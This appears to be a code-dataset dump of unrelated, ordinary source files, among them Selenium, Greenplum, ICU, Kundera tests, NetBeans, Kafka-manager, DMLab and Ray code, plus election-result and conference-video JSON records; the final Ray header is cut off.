348 | {"nom":"Franclens","circ":"4ème circonscription","dpt":"Haute-Savoie","inscrits":341,"abs":184,"votants":157,"blancs":1,"nuls":14,"exp":142,"res":[{"nuance":"LR","nom":"Mme <NAME>","voix":87},{"nuance":"REM","nom":"<NAME>","voix":55}]} | 94 |
25,151 | // Licensed to the Software Freedom Conservancy (SFC) under one
// or more contributor license agreements. See the NOTICE file
// distributed with this work for additional information
// regarding copyright ownership. The SFC licenses this file
// to you under the Apache License, Version 2.0 (the
// "License"); you may not use this file except in compliance
// with the License. You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing,
// software distributed under the License is distributed on an
// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
// KIND, either express or implied. See the License for the
// specific language governing permissions and limitations
// under the License.
package org.openqa.selenium.support.locators;
import com.google.common.io.Resources;
import java.io.IOException;
import java.io.UncheckedIOException;
import java.net.URL;
import java.nio.charset.StandardCharsets;
class RelativeLocatorScript {
static final String FIND_ELEMENTS;
static {
try {
String location = String.format(
"/%s/%s",
RelativeLocator.class.getPackage().getName().replace(".", "/"),
"findElements.js");
URL url = RelativeLocator.class.getResource(location);
String rawFunction = Resources.toString(url, StandardCharsets.UTF_8);
FIND_ELEMENTS = String.format("return (%s).apply(null, arguments);", rawFunction);
} catch (IOException e) {
throw new UncheckedIOException(e);
}
}
private RelativeLocatorScript() {
// Utility class.
}
}
| 500 |
2,067 | KILOBYTE = 1024
MEGABYTE = 1024 * KILOBYTE
MAX_FILE_SIZE = 16 * MEGABYTE
SUPPORTED_FILE_MAGIC = {b"MZ"}
DEFAULT_MIN_LENGTH = 4
MAX_STRING_LENGTH = 2048
| 72 |
2,059 | #pragma once
#include <QObject>
#include <QHash>
#include "graph/watchers.h"
struct Script;
class NodeProxy;
class ScriptWindow;
class InspectorScriptButton;
class ScriptProxy : public QObject, public ScriptWatcher
{
Q_OBJECT
public:
ScriptProxy(Script* s, NodeProxy* parent);
/*
* On script state changes, update the UI
*/
void trigger(const ScriptState& state) override;
public slots:
/*
* Creates a new script window
*/
void newScriptWindow();
signals:
/*
* Instructs windows to update themselves
*/
void stateChanged(const ScriptState& state);
/*
* Signal connected to windows that renames them
*/
void subnameChanged(QString n);
protected:
Script* const script;
InspectorScriptButton* button;
};
| 281 |
5,535 | //---------------------------------------------------------------------------
// Greenplum Database
// Copyright (C) 2008 - 2010 Greenplum, Inc.
//
// @filename:
// CTask.cpp
//
// @doc:
// Task implementation
//---------------------------------------------------------------------------
#include "gpos/task/CTask.h"
#include "gpos/error/CErrorContext.h"
#include "gpos/error/CErrorHandlerStandard.h"
#include "gpos/task/CAutoSuspendAbort.h"
#include "gpos/task/CWorker.h"
using namespace gpos;
// init CTaskId's atomic counter
ULONG_PTR CTaskId::m_counter(0);
const CTaskId CTaskId::m_invalid_tid;
//---------------------------------------------------------------------------
// @function:
// CTask::~CTask
//
// @doc:
// ctor
//
//---------------------------------------------------------------------------
CTask::CTask(CMemoryPool *mp, CTaskContext *task_ctxt, IErrorContext *err_ctxt,
BOOL *cancel)
: m_mp(mp),
m_task_ctxt(task_ctxt),
m_err_ctxt(err_ctxt),
m_err_handle(nullptr),
m_func(nullptr),
m_arg(nullptr),
m_res(nullptr),
m_status(EtsInit),
m_cancel(cancel),
m_cancel_local(false),
m_abort_suspend_count(false),
m_reported(false)
{
GPOS_ASSERT(nullptr != mp);
GPOS_ASSERT(nullptr != task_ctxt);
GPOS_ASSERT(nullptr != err_ctxt);
if (nullptr == cancel)
{
m_cancel = &m_cancel_local;
}
}
//---------------------------------------------------------------------------
// @function:
// CTask::~CTask
//
// @doc:
// dtor
//
//---------------------------------------------------------------------------
CTask::~CTask()
{
GPOS_ASSERT(0 == m_abort_suspend_count);
// suspend cancellation
CAutoSuspendAbort asa;
GPOS_DELETE(m_task_ctxt);
GPOS_DELETE(m_err_ctxt);
CMemoryPoolManager::GetMemoryPoolMgr()->Destroy(m_mp);
}
//---------------------------------------------------------------------------
// @function:
// CTask::Bind
//
// @doc:
// Bind task to function and arguments
//
//---------------------------------------------------------------------------
void
CTask::Bind(void *(*func)(void *), void *arg)
{
GPOS_ASSERT(nullptr != func);
m_func = func;
m_arg = arg;
}
//---------------------------------------------------------------------------
// @function:
// CTask::Execute
//
// @doc:
// Execution of task function; wrapped in asserts to prevent leaks
//
//---------------------------------------------------------------------------
void
CTask::Execute()
{
GPOS_ASSERT(EtsDequeued == m_status);
// final task status
ETaskStatus ets = m_status;
// check for cancel
if (*m_cancel)
{
ets = EtsError;
}
else
{
CErrorHandlerStandard errhdl;
GPOS_TRY_HDL(&errhdl)
{
// mark task as running
SetStatus(EtsRunning);
// call executable function
m_res = m_func(m_arg);
#ifdef GPOS_DEBUG
// check interval since last CFA
GPOS_CHECK_ABORT;
#endif // GPOS_DEBUG
// task completed
ets = EtsCompleted;
}
GPOS_CATCH_EX(ex)
{
// not reset error context with error propagation
ets = EtsError;
}
GPOS_CATCH_END;
}
// signal end of task execution
SetStatus(ets);
}
//---------------------------------------------------------------------------
// @function:
// CTask::SetStatus
//
// @doc:
// Set task status;
// Locking is required if updating more than one variable;
//
//---------------------------------------------------------------------------
void
CTask::SetStatus(ETaskStatus ets)
{
// status changes are monotonic
GPOS_ASSERT(ets >= m_status && "Invalid task status transition");
m_status = ets;
}
//---------------------------------------------------------------------------
// @function:
// CTask::IsScheduled
//
// @doc:
// Check if task has been scheduled
//
//---------------------------------------------------------------------------
BOOL
CTask::IsScheduled() const
{
switch (m_status)
{
case EtsInit:
return false;
break;
case EtsQueued:
case EtsDequeued:
case EtsRunning:
case EtsCompleted:
case EtsError:
return true;
break;
default:
GPOS_ASSERT(!"Invalid task status");
return false;
}
}
//---------------------------------------------------------------------------
// @function:
// CTask::IsFinished
//
// @doc:
// Check if task finished executing
//
//---------------------------------------------------------------------------
BOOL
CTask::IsFinished() const
{
switch (m_status)
{
case EtsInit:
case EtsQueued:
case EtsDequeued:
case EtsRunning:
return false;
break;
case EtsCompleted:
case EtsError:
return true;
break;
default:
GPOS_ASSERT(!"Invalid task status");
return false;
}
}
//---------------------------------------------------------------------------
// @function:
// CTask::ResumeAbort
//
// @doc:
// Decrement counter for requests to suspend abort
//
//---------------------------------------------------------------------------
void
CTask::ResumeAbort()
{
GPOS_ASSERT(0 < m_abort_suspend_count);
m_abort_suspend_count--;
#ifdef GPOS_DEBUG
CWorker *worker = CWorker::Self();
GPOS_ASSERT(nullptr != worker);
#endif
}
#ifdef GPOS_DEBUG
//---------------------------------------------------------------------------
// @function:
// CTask::CheckStatus
//
// @doc:
// Check if task has expected status
//
//---------------------------------------------------------------------------
BOOL
CTask::CheckStatus(BOOL completed)
{
GPOS_ASSERT(!IsCanceled());
if (completed)
{
// task must have completed without an error
return (CTask::EtsCompleted == GetStatus());
}
else
{
// task must still be running
return (IsScheduled() && !IsFinished());
}
}
#endif // GPOS_DEBUG
// EOF
| 1,859 |
348 | <reponame>chamberone/Leaflet.PixiOverlay
{"nom":"Brain-sur-Allonnes","circ":"3ème circonscription","dpt":"Maine-et-Loire","inscrits":1486,"abs":861,"votants":625,"blancs":41,"nuls":17,"exp":567,"res":[{"nuance":"LR","nom":"<NAME>","voix":313},{"nuance":"REM","nom":"<NAME>","voix":254}]} | 119 |
377 | <reponame>gburd/Kundera<gh_stars>100-1000
/*******************************************************************************
* * Copyright 2013 Impetus Infotech.
* *
* * Licensed under the Apache License, Version 2.0 (the "License");
* * you may not use this file except in compliance with the License.
* * You may obtain a copy of the License at
* *
* * http://www.apache.org/licenses/LICENSE-2.0
* *
* * Unless required by applicable law or agreed to in writing, software
* * distributed under the License is distributed on an "AS IS" BASIS,
* * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* * See the License for the specific language governing permissions and
* * limitations under the License.
******************************************************************************/
package com.impetus.client.cassandra.config;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;
import javax.persistence.EntityManager;
import javax.persistence.EntityManagerFactory;
import javax.persistence.Persistence;
import org.apache.cassandra.thrift.ConsistencyLevel;
import org.junit.After;
import org.junit.Assert;
import org.junit.Before;
import org.junit.Test;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import com.impetus.client.cassandra.CassandraClientBase;
import com.impetus.client.cassandra.common.CassandraConstants;
import com.impetus.client.cassandra.service.CassandraHostConfiguration;
import com.impetus.kundera.client.Client;
import com.impetus.kundera.client.cassandra.persistence.CassandraCli;
import com.impetus.kundera.persistence.EntityManagerFactoryImpl;
import com.impetus.kundera.service.HostConfiguration;
/**
* Junit to test Kundera-Cassandra's implementation of {@link PropertySetter}
*
* @author <NAME>
*
*/
public class CassandraPropertySetterTest
{
/**
*
*/
private static final String _PU = "CassandraXmlPropertyTest";
private EntityManagerFactory emf;
private EntityManager em;
private Map<String, Object> puProperties = new HashMap<String, Object>();
private Logger logger = LoggerFactory.getLogger(CassandraPropertySetterTest.class);
/**
* creates client connection and keyspace
*/
@Before
public void setUp() throws Exception
{
CassandraCli.cassandraSetUp();
puProperties.put("kundera.ddl.auto.prepare", "create-drop");
puProperties.put("kundera.keyspace", "KunderaKeyspace");
puProperties.put("kundera.client.lookup.class", "com.impetus.client.cassandra.thrift.ThriftClientFactory");
puProperties.put("kundera.nodes", "localhost");
puProperties.put("kundera.port", "9160");
puProperties.put("kundera.client.property", "kunderaTest.xml");
emf = Persistence.createEntityManagerFactory(_PU, puProperties);
}
/**
* Drops keyspace and closes connection
*/
@After
public void tearDown() throws Exception
{
em.close();
emf.close();
puProperties = null;
CassandraCli.dropKeySpace("KunderaKeyspace");
}
/**
* Sets property of cassandra client in form of string
*/
@Test
public void testStringPropertyValues()
{
try
{
Map<String, Object> puPropertiesString = new HashMap<String, Object>();
Map<String, Object> ttv = new HashMap<String, Object>();
ttv.put("", "");
puPropertiesString.put(CassandraConstants.CQL_VERSION, "" + CassandraConstants.CQL_VERSION_2_0);
puPropertiesString.put("consistency.level", "" + (ConsistencyLevel.QUORUM));
puPropertiesString.put("ttl.per.request", "" + true);
puPropertiesString.put("ttl.per.session", "" + false);
puPropertiesString.put("ttl.values", ttv);
em = emf.createEntityManager(puPropertiesString);
Map<String, Client> clients = (Map<String, Client>) em.getDelegate();
Client client = clients.get(_PU);
Field f;
f = ((CassandraClientBase) client).getClass().getSuperclass().getDeclaredField("consistencyLevel"); // NoSuchFieldException
f.setAccessible(true);
Assert.assertEquals(f.get((CassandraClientBase) client), ConsistencyLevel.QUORUM);
f = ((CassandraClientBase) client).getClass().getSuperclass().getDeclaredField("cqlVersion"); // NoSuchFieldException
f.setAccessible(true);
Assert.assertEquals(f.get((CassandraClientBase) client), CassandraConstants.CQL_VERSION_2_0);
Assert.assertTrue(((CassandraClientBase) client).isTtlPerRequest());
Assert.assertFalse(((CassandraClientBase) client).isTtlPerSession());
Assert.assertEquals(((CassandraClientBase) client).getTtlValues().size(), ttv.size());
}
catch (NoSuchFieldException nfe)
{
Assert.fail();
logger.error("Error in test, Caused by: .", nfe.getMessage());
}
catch (IllegalArgumentException iae)
{
Assert.fail();
logger.error("Error in test, Caused by: .", iae.getMessage());
}
catch (IllegalAccessException e)
{
Assert.fail();
logger.error("Error in test, Caused by: .", e.getMessage());
}
}
/**
* Sets property of cassandra client in form of object map
*/
@Test
public void testObjectPropertyValues()
{
try
{
Map<String, Object> puPropertiesObj = new HashMap<String, Object>();
Map<String, Object> ttv = new HashMap<String, Object>();
ttv.put("test", "1");
puPropertiesObj.put(CassandraConstants.CQL_VERSION, CassandraConstants.CQL_VERSION_2_0);
puPropertiesObj.put("consistency.level", ConsistencyLevel.QUORUM);
puPropertiesObj.put("ttl.per.request", true);
puPropertiesObj.put("ttl.per.session", false);
puPropertiesObj.put("ttl.values", ttv);
em = emf.createEntityManager(puPropertiesObj);
Map<String, Client> clients = (Map<String, Client>) em.getDelegate();
Client client = clients.get(_PU);
Field f;
f = ((CassandraClientBase) client).getClass().getSuperclass().getDeclaredField("consistencyLevel"); // NoSuchFieldException
f.setAccessible(true);
Assert.assertEquals(f.get((CassandraClientBase) client), ConsistencyLevel.QUORUM);
f = ((CassandraClientBase) client).getClass().getSuperclass().getDeclaredField("cqlVersion"); // NoSuchFieldException
f.setAccessible(true);
Assert.assertEquals(f.get((CassandraClientBase) client), CassandraConstants.CQL_VERSION_2_0);
Assert.assertTrue(((CassandraClientBase) client).isTtlPerRequest());
Assert.assertFalse(((CassandraClientBase) client).isTtlPerSession());
Assert.assertEquals(((CassandraClientBase) client).getTtlValues().size(), ttv.size());
}
catch (NoSuchFieldException nfe)
{
Assert.fail();
logger.error("Error in test, Caused by: .", nfe.getMessage());
}
catch (IllegalArgumentException iae)
{
Assert.fail();
logger.error("Error in test, Caused by: .", iae.getMessage());
}
catch (IllegalAccessException e)
{
Assert.fail();
logger.error("Error in test, Caused by: .", e.getMessage());
}
}
/*
* tests emf properties set partially from external map and persistence.xml
*/
@Test
public void testPartialOverridingOfPUProperties()
{
Map<String, Object> puMap = new HashMap<String, Object>();
puMap.put("kundera.keyspace", "KunderaKeyspace");
puMap.put("kundera.port", "9160");
puMap.put("kundera.client.lookup.class", "com.impetus.client.cassandra.thrift.ThriftClientFactory");
puMap.put(CassandraConstants.CQL_VERSION, CassandraConstants.CQL_VERSION_3_0);
emf = Persistence.createEntityManagerFactory("partialPropertyOverridePU", puMap);
em = emf.createEntityManager();
HostConfiguration hostConfig = new CassandraHostConfiguration(puMap, CassandraPropertyReader.csmd,
"partialPropertyOverridePU", ((EntityManagerFactoryImpl) emf).getKunderaMetadataInstance());
Assert.assertEquals(hostConfig.getHosts().get(0).getHost(), "localhost");
Assert.assertEquals(hostConfig.getHosts().get(0).getPort(), 9160);
}
}
| 3,429 |
12,278 | // © 2016 and later: Unicode, Inc. and others.
// License & terms of use: http://www.unicode.org/copyright.html
/*
******************************************************************************
* Copyright (C) 2015, International Business Machines
* Corporation and others. All Rights Reserved.
******************************************************************************
* sharedobject.cpp
*/
#include "sharedobject.h"
#include "mutex.h"
#include "uassert.h"
#include "umutex.h"
#include "unifiedcache.h"
U_NAMESPACE_BEGIN
SharedObject::~SharedObject() {}
UnifiedCacheBase::~UnifiedCacheBase() {}
void
SharedObject::addRef() const {
umtx_atomic_inc(&hardRefCount);
}
// removeRef Decrement the reference count and delete if it is zero.
// Note that SharedObjects with a non-null cachePtr are owned by the
// unified cache, and the cache will be responsible for the actual deletion.
// The deletion could be as soon as immediately following the
// update to the reference count, if another thread is running
// a cache eviction cycle concurrently.
// NO ACCESS TO *this PERMITTED AFTER REFERENCE COUNT == 0 for cached objects.
// THE OBJECT MAY ALREADY BE GONE.
void
SharedObject::removeRef() const {
const UnifiedCacheBase *cache = this->cachePtr;
int32_t updatedRefCount = umtx_atomic_dec(&hardRefCount);
U_ASSERT(updatedRefCount >= 0);
if (updatedRefCount == 0) {
if (cache) {
cache->handleUnreferencedObject();
} else {
delete this;
}
}
}
int32_t
SharedObject::getRefCount() const {
return umtx_loadAcquire(hardRefCount);
}
void
SharedObject::deleteIfZeroRefCount() const {
if (this->cachePtr == nullptr && getRefCount() == 0) {
delete this;
}
}
U_NAMESPACE_END
| 641 |
435 | <reponame>amaajemyfren/data<filename>pycon-ar-2018/videos/import-genero-diversidad-panel.json
{
"copyright_text": "Creative Commons Attribution license (reuse allowed)",
"description": "Debate sobre g\u00e9nero y diversidad. \n\nHablemos del avance del movimiento de mujeres e identidades disidentes, de violencias, diversidad e inclusi\u00f3n en el mundo inform\u00e1tico. \n\nPanelistas: \n\n- Luc\u00<NAME>\u00<NAME> (licenciada en comunicaci\u00f3n social, periodista, directora de la Comisi\u00f3n de DD. HH. en la Legislatura de la Ciudad de Buenos Aires)\n- <NAME> (analista programadora en formaci\u00f3n, trabaja haciendo sat\u00e9lites, form\u00f3 parte de distintos espacios feministas)\n- <NAME> (mujer trans, analista funcional y t\u00e9cnica en operaciones, co-administradora de los grupos de Facebook Transgente y TRANSLABURO)\n- Andr\u00e9s Snitcofsky (dise\u00f1ador gr\u00e1fico en deconstrucci\u00f3n, apasionado de la visualizaci\u00f3n de datos, integrante de Econom\u00eda Femini(s)ta)\n\nModera: <NAME> (licenciada en trabajo social, militante feminista, trabajadora del Programa Nacional de Prevenci\u00f3n del C\u00e1ncer Cervicouterino).\n",
"language": "spa",
"recorded": "2018-11-24",
"speakers": [
"Luc\u00<NAME>\u00<NAME>",
"<NAME>",
"<NAME>",
"Andr\u00<NAME>",
"<NAME>"
],
"tags": [
"panel"
],
"thumbnail_url": "https://i.ytimg.com/vi/jcdJhqKmNyI/hqdefault.jpg",
"title": "import g\u00e9nero, diversidad (panel)",
"videos": [
{
"type": "youtube",
"url": "https://www.youtube.com/watch?v=jcdJhqKmNyI"
}
]
}
| 687 |
1,056 | /*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.netbeans.modules.j2ee.jpa.verification.fixes;
import java.util.logging.Level;
import javax.swing.SwingUtilities;
import org.netbeans.api.project.Project;
import org.netbeans.modules.j2ee.jpa.verification.JPAProblemFinder;
import org.netbeans.modules.j2ee.persistence.provider.InvalidPersistenceXmlException;
import org.netbeans.modules.j2ee.persistence.wizard.Util;
import org.netbeans.spi.editor.hints.ChangeInfo;
import org.netbeans.spi.editor.hints.Fix;
import org.openide.util.NbBundle;
/**
*
* @author T<EMAIL>
*/
public class CreatePersistenceUnit implements Fix {
private Project project;
/** Creates a new instance of CreatePersistenceUnit */
public CreatePersistenceUnit(Project project) {
this.project = project;
}
public ChangeInfo implement(){
SwingUtilities.invokeLater(new Runnable(){
public void run() {
try{
Util.createPersistenceUnitUsingWizard(project, null);
} catch(InvalidPersistenceXmlException e){
JPAProblemFinder.LOG.log(Level.WARNING, e.getMessage(), e);
}
}
});
return null;
}
public int hashCode(){
return this.getClass().getName().hashCode();
}
public boolean equals(Object o){
// TODO: implement equals properly
return super.equals(o);
}
public String getText(){
return NbBundle.getMessage(CreatePersistenceUnit.class, "LBL_CreatePersistenceUnitHint");
}
}
| 849 |
2,177 | <gh_stars>1000+
package org.nutz.ioc.meta.issue1232;
import org.nutz.ioc.loader.annotation.IocBean;
@IocBean(name="c")
public class Issue1232ClassC {
}
| 69 |
320 | from math import tanh
import gym
RAW_SCORE_SUMMARY_KEY_SUFFIX = 'dmlab_raw_score'
class DmlabRewardShapingWrapper(gym.Wrapper):
def __init__(self, env):
super().__init__(env)
self.raw_episode_return = self.episode_length = 0
def reset(self):
obs = self.env.reset()
self.raw_episode_return = self.episode_length = 0
return obs
def step(self, action):
obs, rew, done, info = self.env.step(action)
self.raw_episode_return += rew
self.episode_length += info.get('num_frames', 1)
# optimistic asymmetric clipping from IMPALA paper
squeezed = tanh(rew / 5.0)
clipped = 0.3 * squeezed if rew < 0.0 else squeezed
rew = clipped * 5.0
if done:
score = self.raw_episode_return
info['episode_extra_stats'] = dict()
level_name = self.unwrapped.level_name
# add extra 'z_' to the summary key to put them towards the end on tensorboard (just convenience)
level_name_key = f'z_{self.unwrapped.task_id:02d}_{level_name}'
info['episode_extra_stats'][f'{level_name_key}_{RAW_SCORE_SUMMARY_KEY_SUFFIX}'] = score
info['episode_extra_stats'][f'{level_name_key}_len'] = self.episode_length
return obs, rew, done, info
| 584 |
14,668 | // Copyright 2021 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef CHROME_BROWSER_ENTERPRISE_CONNECTORS_DEVICE_TRUST_BROWSER_BROWSER_DEVICE_TRUST_CONNECTOR_SERVICE_H_
#define CHROME_BROWSER_ENTERPRISE_CONNECTORS_DEVICE_TRUST_BROWSER_BROWSER_DEVICE_TRUST_CONNECTOR_SERVICE_H_
#include "base/memory/raw_ptr.h"
#include "chrome/browser/enterprise/connectors/device_trust/device_trust_connector_service.h"
class PrefService;
namespace enterprise_connectors {
class DeviceTrustKeyManager;
// Browser-specific service in charge of monitoring the status of the Device
// Trust connector (e.g. enabled or not).
class BrowserDeviceTrustConnectorService : public DeviceTrustConnectorService {
public:
explicit BrowserDeviceTrustConnectorService(
DeviceTrustKeyManager* key_manager,
PrefService* profile_prefs);
BrowserDeviceTrustConnectorService(
const BrowserDeviceTrustConnectorService&) = delete;
BrowserDeviceTrustConnectorService& operator=(
const BrowserDeviceTrustConnectorService&) = delete;
~BrowserDeviceTrustConnectorService() override;
protected:
// Hook that can is called to notify that the policy changed and the connector
// became, or is still, enabled.
void OnConnectorEnabled() override;
private:
raw_ptr<DeviceTrustKeyManager> key_manager_;
};
} // namespace enterprise_connectors
#endif // CHROME_BROWSER_ENTERPRISE_CONNECTORS_DEVICE_TRUST_BROWSER_BROWSER_DEVICE_TRUST_CONNECTOR_SERVICE_H_
| 476 |
388 | <filename>loadgen/tests/loadgen_test_main.cc
/* Copyright 2019 The MLPerf Authors. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
==============================================================================*/
/// \file
/// \brief A main entry point a test binary can use if it just wants to execute
/// Test::Run on all statically registered tests.
#include <regex>
#include "loadgen_test.h"
int main(int argc, char* argv[]) {
if (argc <= 1) {
std::cerr << "Usage: " << argv[0] << " <include_regex> <exclude_regex>\n";
return -1;
}
std::regex include_regex(argc >= 2 ? argv[1] : ".*");
std::regex exclude_regex(argc >= 3 ? std::regex(argv[2]) : std::regex());
auto test_filter = [&](const char* test_name) {
return (std::regex_search(test_name, include_regex) &&
!std::regex_search(test_name, exclude_regex));
};
return Test::Run(test_filter);
}
| 439 |
369 | // Copyright (c) 2017-2021, Mudit<NAME>.o. All rights reserved.
// For licensing, see https://github.com/mudita/MuditaOS/LICENSE.md
#pragma once
#include <endpoints/DBHelper.hpp>
#include <CalllogRecord.hpp>
#include <json11.hpp>
namespace sdesktop::endpoints
{
class CalllogHelper : public DBHelper
{
public:
explicit CalllogHelper(sys::Service *_ownerServicePtr) : DBHelper(_ownerServicePtr){};
auto createDBEntry(Context &context) -> sys::ReturnCodes override;
auto requestDataFromDB(Context &context) -> sys::ReturnCodes override;
auto updateDBEntry(Context &context) -> sys::ReturnCodes override;
auto deleteDBEntry(Context &context) -> sys::ReturnCodes override;
auto requestCount(Context &context) -> sys::ReturnCodes;
static auto to_json(CalllogRecord record) -> json11::Json;
auto getCalllogCount(Context &context) -> sys::ReturnCodes;
auto getCalllogByContactID(Context &context) -> sys::ReturnCodes;
};
namespace json::calllog
{
inline constexpr auto count = "count";
inline constexpr auto limit = "limit";
inline constexpr auto offset = "offset";
inline constexpr auto presentation = "presentation";
inline constexpr auto date = "date";
inline constexpr auto duration = "duration";
inline constexpr auto id = "id";
inline constexpr auto type = "type";
inline constexpr auto name = "name";
inline constexpr auto contactId = "contactId";
inline constexpr auto phoneNumber = "phoneNumber";
inline constexpr auto isRead = "isRead";
} // namespace json::calllog
} // namespace sdesktop::endpoints
| 689 |
2,180 | package com.xiaojukeji.kafka.manager.service.service;
import com.xiaojukeji.kafka.manager.common.entity.ResultStatus;
import com.xiaojukeji.kafka.manager.common.entity.ao.BrokerBasicDTO;
import com.xiaojukeji.kafka.manager.common.entity.ao.TopicDiskLocation;
import com.xiaojukeji.kafka.manager.common.entity.ao.cluster.ClusterBrokerStatus;
import com.xiaojukeji.kafka.manager.common.entity.metrics.BrokerMetrics;
import com.xiaojukeji.kafka.manager.common.entity.ao.BrokerOverviewDTO;
import com.xiaojukeji.kafka.manager.common.entity.pojo.BrokerDO;
import com.xiaojukeji.kafka.manager.common.entity.pojo.BrokerMetricsDO;
import java.util.Date;
import java.util.List;
import java.util.Set;
/**
* Broker模块的service接口
* @author tukun, zengqiao
* @date 2015/11/9
*/
public interface BrokerService {
ClusterBrokerStatus getClusterBrokerStatus(Long clusterId);
/**
* 获取Broker列表信息
*/
List<BrokerOverviewDTO> getBrokerOverviewList(Long clusterId, Set<Integer> brokerIdSet);
/**
* 获取BrokerMetrics信息
*/
List<BrokerMetrics> getBrokerMetricsFromJmx(Long clusterId, Set<Integer> brokerIdSet, Integer metricsCode);
/**
* 获取BrokerMetrics信息
*/
BrokerMetrics getBrokerMetricsFromJmx(Long clusterId, Integer brokerId, Integer metricsCode);
/**
* 根据时间区间获取Broker监控数据
*/
List<BrokerMetricsDO> getBrokerMetricsFromDB(Long clusterId, Integer brokerId, Date startTime, Date endTime);
List<TopicDiskLocation> getBrokerTopicLocation(Long clusterId, Integer brokerId);
/**
* 计算Broker的峰值均值流量
*/
Double calBrokerMaxAvgBytesIn(Long clusterId,
Integer brokerId,
Integer duration,
Date startTime,
Date endTime);
/**
* 根据Cluster和brokerId获取broker的具体信息
*/
BrokerBasicDTO getBrokerBasicDTO(Long clusterId, Integer brokerId);
String getBrokerVersion(Long clusterId, Integer brokerId);
List<BrokerDO> listAll();
int replace(BrokerDO brokerDO);
ResultStatus delete(Long clusterId, Integer brokerId);
}
| 968 |
923 | <gh_stars>100-1000
// Ouzel by <NAME>
#ifndef OUZEL_AUDIO_SOUND_HPP
#define OUZEL_AUDIO_SOUND_HPP
#include <cstdint>
#include <memory>
#include <string>
#include <vector>
namespace ouzel::audio
{
class Audio;
class Sound
{
friend Audio;
public:
enum class Format
{
pcm,
vorbis
};
Sound(Audio& initAudio, std::size_t initSourceId, Format initFormat);
virtual ~Sound();
Sound(const Sound&) = delete;
Sound& operator=(const Sound&) = delete;
Sound(Sound&&) = delete;
Sound& operator=(Sound&&) = delete;
auto getSourceId() const noexcept { return sourceId; }
auto getFormat() const noexcept { return format; }
protected:
Audio& audio;
std::size_t sourceId = 0;
Format format;
};
}
#endif // OUZEL_AUDIO_SOUND_HPP
| 406 |
599 | <reponame>laodiu/bk-bcs<gh_stars>100-1000
#!/usr/bin/env python
#-*- coding:utf8 -*-
# Tencent is pleased to support the open source community by making Blueking Container Service available.
# Copyright (C) 2019 THL A29 Limited, a Tencent company. All rights reserved.
# Licensed under the MIT License (the "License"); you may not use this file except
# in compliance with the License. You may obtain a copy of the License at
# http://opensource.org/licenses/MIT
# Unless required by applicable law or agreed to in writing, software distributed under
# the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
def get_cpu_core_dict():
cpuinfos = open("/proc/cpuinfo").read()
print cpuinfos
core_dict = {}
for seg in cpuinfos.split("\n\n"):
coreid = -1
processor_list = []
for line in seg.split("\n"):
if line.startswith("processor"):
processorid = line.split(":")[1].strip()
processor_list.append(int(processorid))
elif line.startswith("core id"):
tmp_core_id = line.split(":")[1].strip()
coreid = int(tmp_core_id)
if coreid != -1:
if coreid in core_dict:
core_dict[coreid] = core_dict[coreid] + processor_list
else:
core_dict[coreid] = processor_list
return core_dict
if __name__ == "__main__":
reserved_cores_str = os.environ.get("BCS_CPUSET_RESERVED_LAST_CORE_NUM", "")
if reserved_cores_str == "":
print "BCS_CPUSET_RESERVED_LAST_CORE_NUM is empty, do not reserve cpu cores"
sys.exit(0)
reserved_cores = int(reserved_cores_str)
core_dict = get_cpu_core_dict()
key_list = core_dict.keys()
key_list.sort(reverse=True)
counter = 0
reserved_logical_core_list = []
for key in key_list:
if counter < reserved_cores:
reserved_logical_core_list = reserved_logical_core_list + core_dict[key]
counter = counter + 1
else:
break
reserved_logical_core_list.sort()
print "reserved logical core list: ", reserved_logical_core_list
print "export bcsCpuSetReservedCpuSetList=%s" % ",".join(str(x) for x in reserved_logical_core_list)
| 987 |
1,792 | <reponame>javahongxi/whatsmars-mars001
package org.hongxi.whatsmars.boot.sample.swagger.model;
import lombok.Data;
/**
* Created by shenhongxi on 2020/8/16.
*/
@Data
public class User {
private String name;
private Integer age;
}
| 98 |
21,382 | // Copyright 2017 The Ray Authors.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
#pragma once
#include "absl/base/thread_annotations.h"
#include "absl/synchronization/mutex.h"
#include "absl/time/clock.h"
#include "ray/common/asio/instrumented_io_context.h"
#include "ray/common/asio/periodical_runner.h"
#include "ray/core_worker/context.h"
#include "ray/gcs/gcs_client.h"
namespace ray {
namespace core {
namespace worker {
class Profiler {
public:
Profiler(WorkerContext &worker_context, const std::string &node_ip_address,
instrumented_io_context &io_service,
const std::shared_ptr<gcs::GcsClient> &gcs_client);
// Add an event to the queue to be flushed periodically.
void AddEvent(const rpc::ProfileTableData::ProfileEvent &event) LOCKS_EXCLUDED(mutex_);
private:
// Flush all of the events that have been added since last flush to the GCS.
void FlushEvents() LOCKS_EXCLUDED(mutex_);
// Mutex guarding rpc_profile_data_.
absl::Mutex mutex_;
// ASIO IO service event loop. Must be started by the caller.
